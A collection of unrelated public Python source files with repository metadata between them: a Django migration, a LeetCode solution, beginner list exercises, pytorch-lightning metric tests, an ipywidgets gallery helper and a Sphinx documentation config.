        """Parse French-day opening-hour strings (e.g. 'lu 09:30-18:30')
        from ld_data['openingHours'] into an OpeningHours object;
        non-matching entries are skipped."""
        opening_hours = OpeningHours()
        # day abbrev, open HH:MM, close HH:MM
        regex = re.compile(r"(lu|ma|me|je|ve|sa|su)\s+(\d{2}:\d{2})\s*-(\d{2}:\d{2})")
        for hours_str in ld_data["openingHours"]:
            match = re.search(regex, hours_str)
            if match:
                day_of_week = match.group(1).capitalize()
                open_time = match.group(2)
                close_time = match.group(3)
                opening_hours.add_range(day=DAYS_FR[day_of_week], open_time=open_time, close_time=close_time)
        return opening_hours
|
[
"noreply@github.com"
] |
alltheplaces.noreply@github.com
|
d2a116fd1e388ccc8ebd0e3a4c78b63d1b0b2041
|
cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45
|
/Personal/Cmmercial/products/migrations/0001_initial.py
|
3f1b13821e51314afd7b2052f0cec407866a824f
|
[] |
no_license
|
ProsenjitKumar/PycharmProjects
|
d90d0e7c2f4adc84e861c12a3fcb9174f15cde17
|
285692394581441ce7b706afa3b7af9e995f1c55
|
refs/heads/master
| 2022-12-13T01:09:55.408985
| 2019-05-08T02:21:47
| 2019-05-08T02:21:47
| 181,052,978
| 1
| 1
| null | 2022-12-08T02:31:17
| 2019-04-12T17:21:59
| null |
UTF-8
|
Python
| false
| false
| 1,216
|
py
|
# Generated by Django 2.1.3 on 2018-11-21 08:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial schema for the products app: Product,
    # ProductCategory, and the Product.category foreign key.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('image', models.ImageField(blank=True, upload_to='product_photo/')),
                ('description', models.TextField()),
                ('price', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='ProductCategory',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=255)),
            ],
        ),
        # FK added after both models exist so the target is resolvable.
        migrations.AddField(
            model_name='product',
            name='category',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='products.ProductCategory'),
        ),
    ]
|
[
"prosenjitearnkuar@gmail.com"
] |
prosenjitearnkuar@gmail.com
|
e3554e38fb6ff22a2f5045724ea53f7595a4c7e5
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/number-of-unequal-triplets-in-array.py
|
b5c5df654ed10cc8343e709f7badcabd6c662a00
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 551
|
py
|
# Time: O(n * k) = O(3 * n)
# Space: O(n + k) = O(n)
import collections
# freq table, dp
class Solution(object):
    def unequalTriplets(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        Count triplets (i < j < k) whose three values are pairwise
        distinct. Single pass with a frequency table: dp[i] holds the
        number of pairwise-unequal (i+1)-plets over the elements seen so
        far; other_cnt excludes plets that would reuse the current value.
        """
        K = 3
        cnt = collections.Counter()  # occurrences of each value seen so far
        dp = [0]*K  # dp[i]: number of unequal (i+1)-plets
        for x in nums:
            cnt[x] += 1
            other_cnt = 1
            # range() instead of Python-2-only xrange so the code also runs
            # under Python 3; behavior is identical for this small K.
            for i in range(K):
                dp[i] += other_cnt
                # subtract plets that would pair x with another copy of x
                other_cnt = dp[i]-cnt[x]*other_cnt
        return dp[K-1]
|
[
"noreply@github.com"
] |
kamyu104.noreply@github.com
|
333b9acb1c421772b36728887c628c06910f5ea9
|
47deebe6fefedb01fdce5d4e82f58bb08f8e1e92
|
/python core/Lesson_9/list_15.py
|
3c9f1848f5a41869c089d25a9f31a5453ed7030e
|
[] |
no_license
|
developeryuldashev/python-core
|
5bb162603bdb5782acf05e3fb25ca5dd6347067a
|
08fca77c9cfde69d93a7875b3fb65b98f3dabd78
|
refs/heads/main
| 2023-08-21T03:33:12.160133
| 2021-10-19T04:56:53
| 2021-10-19T04:56:53
| 393,383,696
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
# Walk list `a` backwards two elements at a time: b collects
# a[n-1], a[n-3], ... and c collects a[n-2], a[n-4], ...
a=[1,2,3,4,5,6,3,4,5,8,9]
b=[]
c=[]
n=len(a)
i=n
while i>0:
    b.append(a[i-1])
    # NOTE(review): on the final iteration of an odd-length list (i == 1)
    # this reads a[-1], i.e. the LAST element again — likely unintended.
    c.append(a[i-2])
    i-=2
print(b)
print(c)
|
[
"81365808+developeryuldashev@users.noreply.github.com"
] |
81365808+developeryuldashev@users.noreply.github.com
|
300add98b274304dbcde91ccbb0f8fb7c2bda876
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/pandas/tests/series/test_internals.py
|
0febda9b710f4d9388ea3bf53da20bcf4f5af3c0
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:cef8d1aa7b5483d0f8576d8863c0fa66a3fd81948992238d8d5f1a5531cee05a
size 8984
|
[
"github@cuba12345"
] |
github@cuba12345
|
14dc45b7b1ffbddfdfb9e556d2237d15b7495403
|
14d940630ab365be939fc08d3d95b0a98789bae7
|
/lab32_list_comprehension_parte1.py
|
ab0e3c4e44cd1d99e38f7d80a38a5e3f85b41e0a
|
[] |
no_license
|
accolombini/python_completo
|
1da6f58f0c57b978d70582d96dc12b80c2d5b8a8
|
935102173a1112273b09734392dca08d76e9c749
|
refs/heads/master
| 2023-01-09T07:51:15.494101
| 2020-10-11T23:39:08
| 2020-10-11T23:39:08
| 283,790,276
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,343
|
py
|
"""
List Comprehension ->> utilizando List Comprehension nós podemos gerar novas listas com dados processados
a partir de outro iterável (uma coleção de dados)
- Sintaxe da List Comprehension
- [dado clausula for dado in itervael]
<$> Para melhor entender o que está acontecendo devemos dividir a expressão em duas partes:
- A primeira parte: for dado in iteravel
- A segunda parte: dado <-> aplica-se a operação expressa em clausula
"""
# Exemplos
numeros = [1, 2, 3, 4, 5] # Nosso iterável exemplo
print(f'Neste primeiro exemplo nossa lista-> {numeros}\nSeu tipo é -> {type(numeros)}')
# Observe o poder da list comprehension
res = [numero * 10 for numero in numeros]
print(f'Neste primeiro exemplo vamos multiplicar cada elemento da lista por 10 -> {res}\nSeu tipo é -> {type(res)}')
# Exemplos observe o poder do comprehension
res = [numero / 2 for numero in numeros]
print(f'Neste primeiro exemplo vamos dividir cada elemento da lista por 2 -> {res}\nSeu tipo é -> {type(res)}')
def funcao(valor):
    """
    Helper used to demonstrate calling a function from a comprehension.

    :param valor: value received from the iterable being processed
    :return: the value multiplied by itself (its square)
    """
    squared = valor * valor
    return squared
res = [funcao(numero) for numero in numeros]
print(f'Neste exemplo vamos trabalhar com a função teste -> {res}\nSeu tipo é -> {type(res)}')
# Comparing the two approaches =>> list comprehension x loop
# Loop version
numeros = [1, 2, 3, 4, 5]
numeros_dobrados = []
for numero in numeros:
    numero_dobrado = numero * 2
    numeros_dobrados.append(numero_dobrado)
print(f'Comparando List Comprehension x loop -> loop {numeros_dobrados}\nSeu tipo é {type(numeros_dobrados)}')
# Refactored loop version, closer in spirit to the comprehension
numeros_dobrados = []
for numero in [1, 2, 3, 4, 5]:
    numeros_dobrados.append(numero * 2)
print(f'Comparando após refatorado List Comprehension x loop -> loop {numeros_dobrados}\nSeu tipo é {type(numeros_dobrados)}')
# The same example with a list comprehension ->> compare both forms!
res = [numero * 2 for numero in numeros]
print(f'O mesmo exemplo com list Comprehension {res}')
print(f'O mesmo exemplo com list Comprehension {[numero * 2 for numero in numeros]}')
# More examples
# Example 1 -> upper-case every character of a string
nome = 'Python para Ciência de Dados'
print(f'Exemplos de uso de list comprehension -> {[letra.upper() for letra in nome]}\nSeu tipo é -> {type([letra.upper() for letra in nome])}')
# Example 2 -> capitalize only the first character of each name
amigos = ['joão', 'pedro', 'fernando', 'mariana', 'carlos']
print(f'Primeiro em maiúcula -> {[amigo.title() for amigo in amigos]}')
# Example 3 -> working with range -> multiply each range value by 10
print(f'Trabalhando com range -> {[numero * 10 for numero in range(1, 10)]}')
# Example 4 -> converting a list to booleans
print(f'Converte para Boolean -> {[bool(valor) for valor in [0, [],"", True, 1, 2, 3, 100.37]]}')
# Example 5 -> turning numbers into strings with a cast
print(f'Tranformando números em strings -> {[str(letra) for letra in [1, 2, 3, 4, 5]]}')
|
[
"accolombini@gmail.com"
] |
accolombini@gmail.com
|
7af3564ec490ee7c916717f5e43254d06bac12c9
|
3c73609eea12d6784ffc0be5acc6994cda19dc57
|
/Codeforces Difficulty 500-700/595AVitalyAndNight.py
|
c02b2a9caee1ba24e4511fe2d5b3542c6977975d
|
[] |
no_license
|
TanveshT/Competitive-Programming
|
0cf7a8ebc20a74cb6fd8505e67fbfec5bac6b8c2
|
47acc0a2af2711c86bb0da06e961677a8ec1e7d3
|
refs/heads/master
| 2022-12-19T01:44:46.033633
| 2020-09-25T06:57:23
| 2020-09-25T06:57:23
| 258,095,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 225
|
py
|
# Codeforces 595A: count flat compartments (pairs of adjacent windows)
# in which at least one window has its light on (value 1).
floors, flats_per_floor = map(int, input().split())
window_count = 2 * flats_per_floor
lit_flats = 0
for _ in range(floors):
    windows = list(map(int, input().split()))
    # Windows come in pairs per flat: (0,1), (2,3), ...
    lit_flats += sum(
        1
        for left in range(0, window_count, 2)
        if windows[left] == 1 or windows[left + 1] == 1
    )
print(lit_flats)
|
[
"tanveshtakawale26@gmail.com"
] |
tanveshtakawale26@gmail.com
|
cf11d468c235daf41b6fa67bdd4fd202349ff255
|
579ddcffa5519d0cfde6209d3c030e12b487b05f
|
/LeetCode_June2020/is_subsequence.py
|
28c96b53d3390b07c328f9bf06bdb376456dfb6f
|
[] |
no_license
|
mrshaikh4u/Problem-solving
|
001e00292e531c4205b80785f617c6189ec9f2a8
|
96b257e2053eaaa75a152e92657cbf39f9169b8a
|
refs/heads/master
| 2022-11-13T19:48:43.565431
| 2022-11-03T18:42:49
| 2022-11-03T18:42:49
| 252,262,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 607
|
py
|
class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if t is None or len(t)==0:
return s is None or len(s)==0
if s is None or len(s)==0:
return True
# s = "abc", t = "ahbgdc"
ptr = 0
for c in s:
found = False
while ptr < len(t):
if t[ptr] == c:
found = True
ptr+=1
break
ptr+=1
if found == False:
return False
return True
# Smoke test: an empty string is a subsequence of any string -> prints True.
obj = Solution()
print(obj.isSubsequence("","abcd"))
|
[
"mohamedrshaikh@gmail.com"
] |
mohamedrshaikh@gmail.com
|
781fed99b49ba8f6c143ba1f942e9603e3a68d20
|
e32a75c44ef9c964bc5f97712c8e0e845ee3f6ca
|
/lemmatise_question_vocab.py
|
74408714d90e2917500ed5edbe53dc9a64b74ca6
|
[] |
no_license
|
ankita-kalra/ivqa_belief_set
|
29c40ec4076433ac412728aea603e4e69ce530eb
|
6ebba50ff001e1af6695bb3f4d2643e7072ee153
|
refs/heads/master
| 2020-04-05T17:17:00.834303
| 2018-08-27T09:59:16
| 2018-08-27T09:59:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
# Read the question vocabulary counts file (one "<word> <count>" per line)
# and dump just the words, one per line, for inspection.
with open('data/vqa_trainval_question_word_counts.txt', 'r') as fs:
    lines = fs.readlines()
words = [line.split()[0].strip() for line in lines]
with open('tmp_dump.txt', 'w') as fs:
    for word in words:
        fs.write('%s\n' % word)
from nltk.corpus import wordnet as wn
import nltk
import numpy as np
def is_noun(tag):
    """Return True when *tag* is one of the Penn Treebank noun tags."""
    return tag in ('NN', 'NNS', 'NNP', 'NNPS')
def is_verb(tag):
    """Return True when *tag* is one of the Penn Treebank verb tags."""
    return tag in ('VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ')
def is_adverb(tag):
    """Return True when *tag* is one of the Penn Treebank adverb tags."""
    return tag in ('RB', 'RBR', 'RBS')
def is_adjective(tag):
    """Return True when *tag* is one of the Penn Treebank adjective tags."""
    return tag in ('JJ', 'JJR', 'JJS')
def penn_to_wn(tag):
    """Map a Penn Treebank POS tag to the matching WordNet POS constant.

    Returns None for tags outside the four open word classes.
    Checks are kept lazy so ``wn`` is only touched when a class matches.
    """
    if is_adjective(tag):
        return wn.ADJ
    if is_noun(tag):
        return wn.NOUN
    if is_adverb(tag):
        return wn.ADV
    if is_verb(tag):
        return wn.VERB
    return None
# generated lemmatized words
# For each vocabulary word: POS-tag it in isolation, map the tag to a
# WordNet POS, and lemmatize with that POS when one is available.
lemmatized = []
for i, word in enumerate(words):
    pos_tag = nltk.pos_tag([word])
    tag = pos_tag[0][-1]
    wn_type = penn_to_wn(tag)
    if wn_type is None:
        lem_word = word
    else:
        lem_word = nltk.stem.WordNetLemmatizer().lemmatize(word, wn_type)
    lemmatized.append(lem_word)
# build mapping
# word -> its index in the original vocabulary
vocab = {word: i for i, word in enumerate(words)}
index = []
for lem_word, word in zip(lemmatized, words):
    # NOTE(review): bare except; falls back to the word's own index when the
    # lemma is not itself in the vocabulary.
    try:
        id = vocab[lem_word]
    except:
        id = vocab[word]
    index.append(id)
index = np.array(index, dtype=np.int32)
from scipy.io import savemat
savemat('data/quest_token2lemma.mat', {'word2lemma': index})
|
[
"liufeng@seu.edu.cn"
] |
liufeng@seu.edu.cn
|
fad4277ce6037da4dbeb48ec277ee28b3e0372c9
|
9e1df555176bae216828c404ad7290c2eb030cbf
|
/tests/metrics/test_metric.py
|
d97cd1a176cf294208e20b3b3e4a764318141b3c
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
shijianjian/pytorch-lightning
|
e11be4d4926a1a0c8f605e596bec19926d476876
|
b6f3cf5e52dddedec6f7b3e85c0702b75907452c
|
refs/heads/master
| 2023-03-02T14:58:54.139540
| 2021-02-10T05:38:23
| 2021-02-10T05:38:23
| 318,134,795
| 1
| 0
|
Apache-2.0
| 2020-12-03T09:05:46
| 2020-12-03T09:05:45
| null |
UTF-8
|
Python
| false
| false
| 3,841
|
py
|
import pickle
from collections import OrderedDict
from distutils.version import LooseVersion
import cloudpickle
import numpy as np
import pytest
import torch
from pytorch_lightning.metrics.metric import Metric
torch.manual_seed(42)
class Dummy(Metric):
    # Minimal concrete Metric used as a fixture throughout this test module:
    # one tensor state "x" and no-op update/compute.
    name = "Dummy"
    def __init__(self):
        super().__init__()
        # single scalar tensor state with no distributed reduction function
        self.add_state("x", torch.tensor(0), dist_reduce_fx=None)
    def update(self):
        pass
    def compute(self):
        pass
def test_inherit():
    """Subclassing Metric with minimal overrides must construct cleanly."""
    # Fix: the result was bound to an unused local; instantiation itself
    # is the assertion — any failure raises.
    Dummy()
def test_add_state():
    """add_state wires up the expected reduction for each dist_reduce_fx value."""
    a = Dummy()
    # built-in reductions by name
    a.add_state("a", torch.tensor(0), "sum")
    assert a._reductions["a"](torch.tensor([1, 1])) == 2
    a.add_state("b", torch.tensor(0), "mean")
    assert np.allclose(a._reductions["b"](torch.tensor([1.0, 2.0])).numpy(), 1.5)
    a.add_state("c", torch.tensor(0), "cat")
    assert a._reductions["c"]([torch.tensor([1]), torch.tensor([1])]).shape == (2,)
    # invalid reduction names / reduction objects / default values must raise
    with pytest.raises(ValueError):
        a.add_state("d1", torch.tensor(0), 'xyz')
    with pytest.raises(ValueError):
        a.add_state("d2", torch.tensor(0), 42)
    with pytest.raises(ValueError):
        a.add_state("d3", [torch.tensor(0)], 'sum')
    with pytest.raises(ValueError):
        a.add_state("d4", 42, 'sum')
    # a user-supplied callable is accepted as the reduction
    def custom_fx(x):
        return -1
    a.add_state("e", torch.tensor(0), custom_fx)
    assert a._reductions["e"](torch.tensor([1, 1])) == -1
def test_add_state_persistent():
    """Only persistent states appear in the state dict."""
    a = Dummy()
    a.add_state("a", torch.tensor(0), "sum", persistent=True)
    assert "a" in a.state_dict()
    a.add_state("b", torch.tensor(0), "sum", persistent=False)
    # persistent=False only takes effect on torch >= 1.6
    # NOTE(review): distutils.LooseVersion is deprecated/removed in new Pythons.
    if LooseVersion(torch.__version__) >= LooseVersion("1.6.0"):
        assert "b" not in a.state_dict()
def test_reset():
    """reset() restores a registered state to its default value."""
    class _Resettable(Dummy):
        pass

    metric = _Resettable()
    assert metric.x == 0
    metric.x = torch.tensor(5)
    metric.reset()
    assert metric.x == 0
def test_update():
    """update() mutates state but never populates the computed cache."""
    class _Accumulator(Dummy):
        def update(self, x):
            self.x += x

    metric = _Accumulator()
    assert metric.x == 0
    assert metric._computed is None
    metric.update(1)
    assert metric._computed is None
    assert metric.x == 1
    metric.update(2)
    assert metric.x == 3
    assert metric._computed is None
def test_compute():
    """compute() caches its result and the cache is cleared by update()."""
    class _Summer(Dummy):
        def update(self, x):
            self.x += x

        def compute(self):
            return self.x

    metric = _Summer()
    assert metric.compute() == 0
    assert metric.x == 0
    metric.update(1)
    assert metric._computed is None
    assert metric.compute() == 1
    assert metric._computed == 1
    metric.update(2)
    assert metric._computed is None
    assert metric.compute() == 2
    assert metric._computed == 2
    # called without update, should return cached value
    metric._computed = 5
    assert metric.compute() == 5
def test_forward():
    """__call__ returns the batch value, caches it, and accumulates state."""
    class _Summer(Dummy):
        def update(self, x):
            self.x += x

        def compute(self):
            return self.x

    metric = _Summer()
    assert metric(5) == 5
    assert metric._forward_cache == 5
    assert metric(8) == 8
    assert metric._forward_cache == 8
    assert metric.compute() == 13
class ToPickle(Dummy):
    # Module-level (picklable) subclass used by test_pickle below;
    # local classes defined inside a test function cannot be pickled.
    def update(self, x):
        # in-place add keeps the registered tensor state object
        self.x += x
    def compute(self):
        return self.x
def test_pickle(tmpdir):
    """A metric survives pickle and cloudpickle round trips (no DDP here)."""
    metric = ToPickle()
    metric.update(1)

    blob = pickle.dumps(metric)
    restored = pickle.loads(blob)
    assert restored.compute() == 1
    restored.update(5)
    assert restored.compute() == 5

    blob = cloudpickle.dumps(metric)
    restored = cloudpickle.loads(blob)
    assert restored.compute() == 1
def test_state_dict(tmpdir):
    """Metric states appear in state_dict only while flagged persistent."""
    empty = OrderedDict()
    metric = Dummy()
    assert metric.state_dict() == empty
    metric.persistent(True)
    assert metric.state_dict() == OrderedDict(x=0)
    metric.persistent(False)
    assert metric.state_dict() == empty
|
[
"noreply@github.com"
] |
shijianjian.noreply@github.com
|
4e8c3e29671d3b8ee93186ca9cb39e1dc9041ad6
|
0fbc2dff6c74d79fcdc3170c8bfb2fe8fa955175
|
/notebooks/widget_org.py
|
624b1b94ee375d5ac5c91a1f23818bb2cee26729
|
[
"BSD-3-Clause"
] |
permissive
|
mwcraig/tutorial
|
abedcaa251d63d7de4a0c17f99a7f7dd7639d086
|
e1dfa624b0d043f33b768edeb35629741f4d890f
|
refs/heads/master
| 2022-11-08T15:09:04.056005
| 2019-07-07T22:06:12
| 2019-07-07T23:04:16
| 134,425,268
| 0
| 0
|
BSD-3-Clause
| 2018-05-22T14:11:30
| 2018-05-22T14:11:30
| null |
UTF-8
|
Python
| false
| false
| 7,088
|
py
|
import string
import inspect
from collections import defaultdict
import ipywidgets as widgets
def extract_module_name(obj, full=False):
    """
    Get the name of the module an object was defined in.

    Parameters
    ----------
    obj : object
        Object whose ``__module__`` entry is looked up via
        ``inspect.getmembers``.
    full : bool, optional
        NOTE(review): the semantics look inverted, but callers in this file
        rely on them — ``full=True`` returns only the LAST dotted component
        of the module path, while the default ``full=False`` returns the
        complete dotted path. Kept as-is for backward compatibility.

    Raises
    ------
    ValueError
        If no ``__module__`` member is found on *obj*.
    """
    for name, value in inspect.getmembers(obj):
        if name == '__module__':
            return value.split('.')[-1] if full else value
    # Fix: original message misspelled "module" as "moduel".
    raise ValueError('How odd...no module was found!')
def organized_widgets(organize_by='ui'):
    """
    Return a dictionary of all DOM widgets organized by either which module
    they are in or by the type of UI.

    Parameters
    ----------
    organize_by : str, optional
        Must be one of 'ui' or 'module'. Determines the keys in the returned
        dictionary.

    Returns
    -------
    dict
        Dictionary whose keys are the names of the widget groups and whose
        values are dictionaries. The dictionaries which are the values of
        ``groups`` have the name of the widget to be displayed as
        the key and the class of the widget as the value.
    """
    valid_organizations = ['ui', 'module']

    if organize_by not in valid_organizations:
        # Fix: the second literal was missing its f-prefix, so
        # "{valid_organizations}" was printed verbatim in the error message.
        raise ValueError(f'Invalid value {organize_by} for organize_by. '
                         f'Valid options are: {valid_organizations}')

    all_wids = inspect.getmembers(widgets)

    # Keep public, capitalized names that are concrete DOMWidget subclasses
    # (dead commented-out debugging loop removed).
    widget_dict = {name: wid for name, wid in all_wids
                   if not name.startswith('_') and
                   name[0] in string.ascii_uppercase and
                   issubclass(wid, widgets.DOMWidget) and
                   name != 'DOMWidget'
                   }
    if organize_by == 'ui':
        containers = ['Box', 'VBox', 'HBox', 'GridBox',
                      'Accordion', 'Tab', 'AppLayout', 'GridspecLayout',
                      'TwoByTwoLayout']
        # Bucket by UI role, matching on naming conventions.
        groups = dict(
            sliders={k: v for k, v in widget_dict.items() if 'Slider' in k},
            buttons={k: v for k, v in widget_dict.items() if 'Button' in k},
            containers={k: v for k, v in widget_dict.items() if k in containers},
            texts={k: v for k, v in widget_dict.items() if 'text' in k or 'Text' in k or 'HTML' in k or k in ['Label', 'Password']},
            progress={k: v for k, v in widget_dict.items() if 'Progress' in k},
            selects={k: v for k, v in widget_dict.items() if k in ['Dropdown', 'Select', 'SelectMultiple']},
            media={k: v for k, v in widget_dict.items() if k in ['Audio', 'Image', 'Play', 'Video']}
        )
        # Everything not yet bucketed lands in 'others'.
        all_so_far = [name for k, v in groups.items() for name in v.keys()]
        groups['others'] = {k: v for k, v in widget_dict.items() if k not in all_so_far}
    elif organize_by == 'module':
        groups = defaultdict(dict)
        for k, v in widget_dict.items():
            module_name = extract_module_name(v)
            # Grab just the very last part of the module name for a nicer title
            module_name = module_name.split('_')[-1]
            groups[module_name][k] = v

    return groups
def list_overview_widget(groups,
                         help_url_base='',
                         columns=3,
                         min_width_single_widget=300):
    """
    Create an tab-based display of all of the widgets in ``groups``, with
    a separate tab for each key in groups and links to more detail for each
    widget. The first line of the docstring of each widget provides a
    short description of the widget.
    Parameters
    ----------
    groups : dict
        Dictionary whose keys are the names of the widget groups and whose
        values are dictionaries. The dictionaries which are the values of
        ``groups`` should have the name of the widget to be displayed as
        the key and the class of the widget as the value.
    help_url_base : str, optional
        URL to prepend to the help link for each widget.
    columns : int, optional
        Number of columns to use in displaying the widgets.
    min_width_single_widget : int, optional
        Minimum width, in pixels, of a widget displayed on a tab.
    Returns
    -------
    widgets.Tab
        A ``Tab`` widget with one tab for key of groups in which all of
        the widgets in that group are displayed.
    """
    tabs = widgets.Tab()
    # Empty base means "link to the readthedocs widget list" fallback.
    if help_url_base is None:
        help_url_base = 'https://ipywidgets.readthedocs.io/en/stable/examples/Widget%20List.html'
    titles = []
    kids = []
    def box_maker(name, widget, group):
        # Build one bordered cell: a help-link title plus a live widget instance.
        layout = widgets.Layout(grid_template_columns="1fr",
                                border='2px solid gray')
        b = widgets.GridBox(layout=layout)
        module = extract_module_name(widget, full=True)
        #print(' ', widget.__name__, module)
        # Some widget classes need constructor arguments to instantiate.
        if 'selection' in module:
            extra_args = dict(options=[1, 2, 3])
        elif 'progress' in widget.__name__.lower():
            extra_args = dict(value=50)
        elif 'gridspeclayout' in widget.__name__.lower():
            extra_args = dict(n_rows=3, n_columns=3)
        else:
            extra_args = {}
        wid = widget(description='A label!', **extra_args)
        # First non-empty docstring line serves as the short description.
        try:
            short_description = wid.__doc__.split('\n')[0]
            if not short_description:
                short_description = wid.__doc__.split('\n')[1]
        except AttributeError:
            short_description = ''
        url = f'{help_url_base}#{name}'
        if help_url_base == '':
            help_link = f'<h3><a href="{url}" rel="nofollow" target="_self" style="color:gray;">{name}</a></h3><p>{short_description}</p>'
        else:
            # NOTE(review): JupyterLab-specific attributes to make the local
            # anchor open via the command linker — verify quoting renders.
            magic_stuff = 'data-commandlinker-command="rendermime:handle-local-link" data-commandlinker-args="{"path":"04.00-widget-list.ipynb","id":"#IntRangeSlider"}"'
            help_link = f'<h3><a href="{url}" rel="nofollow" target="_blank" style="color:gray;" {magic_stuff}>{name}</a></h3><p>{short_description}</p>'
        title = widgets.HTML(value=help_link)
        title.layout.padding = '10px'
        b.layout.overflow_x = 'hidden'
        b.children = [title, wid]
        return b
    # One tab per group; each tab is a grid of widget cells.
    for group, group_widgets in groups.items():
        # print(group)
        titles.append(group)
        col_spec = f"repeat({columns}, minmax({min_width_single_widget}px, 1fr)"
        layout = widgets.Layout(grid_template_columns=col_spec,
                                grid_gap='10px 10px')
        kid = widgets.GridBox(layout=layout)
        kid.children = [box_maker(k, v, group) for k, v in group_widgets.items()]
        kids.append(kid)
    tabs.children = kids
    # Humanize tab titles: underscores to spaces, Title Case.
    for i, title in enumerate(titles):
        nice = title.replace('_', ' ')
        tabs.set_title(i, nice.title())
    return tabs
|
[
"mattwcraig@gmail.com"
] |
mattwcraig@gmail.com
|
3daeb98cf549c02dfd2bbba036a474e93b402841
|
5a281cb78335e06c631181720546f6876005d4e5
|
/sahara-10.0.0/api-ref/source/conf.py
|
d7580249d82601bc268b6c35106c8df3c1ec2580
|
[
"Apache-2.0"
] |
permissive
|
scottwedge/OpenStack-Stein
|
d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8
|
7077d1f602031dace92916f14e36b124f474de15
|
refs/heads/master
| 2021-03-22T16:07:19.561504
| 2020-03-15T01:31:10
| 2020-03-15T01:31:10
| 247,380,811
| 0
| 0
|
Apache-2.0
| 2020-03-15T01:24:15
| 2020-03-15T01:24:15
| null |
UTF-8
|
Python
| false
| false
| 7,091
|
py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# sahara documentation build configuration file, created Fri May 6 15:19:20
# 2016.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# Sphinx configuration for the Sahara (Data Processing) API reference build.
import os
import sys
extensions = [
    'os_api_ref',
    'openstackdocstheme'
]
# openstackdocstheme options
repository_name = 'openstack/sahara'
bug_project = '935'
bug_tag = 'api-ref'
html_last_updated_fmt = '%Y-%m-%d %H:%M'
html_theme = 'openstackdocs'
html_theme_options = {
    "sidebar_dropdown": "api_ref",
    "sidebar_mode": "toc",
}
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Data Processing API Reference'
copyright = u'2010-present, OpenStack Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Mid-file import: version strings come from the sahara package itself.
from sahara.version import version_info
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# The short X.Y version.
version = version_info.version_string()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# The reST default role (used for this markup: `text`) to use
# for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
